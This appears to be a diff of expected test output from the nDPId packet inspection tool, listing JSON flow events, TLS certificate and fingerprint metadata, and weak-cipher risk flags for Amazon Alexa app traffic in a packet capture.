{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1490976177416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177416,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZihAAEAGqh6sECrYNu8cssZvAbuB1uWpMeRpe1AQAVe46QAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1490976178110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976178110,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lfxAAEAGejasECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9M+QAAAgQFtAQCCAoA9oPjAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1490976178284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976178284,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww9ZAAOcGpWc27xyyrBAq2AG7xm5KXM+cbPUWhXASH\/7T5AAAAgQFtAEDAwY="} 
00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1490976180796,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976180796,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186164,"flow_last_seen":1490976186164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1490976186164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186164,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hhtAAEAGihesECrYNu8cssZwAbtODwEcAAAAAKAC\/\/9+IQAAAgQFtAQCCAoA9ocHAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1490976186394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976186394,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwCmJAAOcGXtw27xyyrBAq2AG7xnDcplSHTg8BHXASH\/7w+wAAAgQFtAEDAwY="} 
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1490976186398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976186398,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohhxAAEAGiiqsECrYNu8cssZwAbtODwEd3KZUiFAQAVc7bQAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1490976186818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976186818,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWmJAAEARMzysECrYrBAqASHdADUAQT24ItEBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
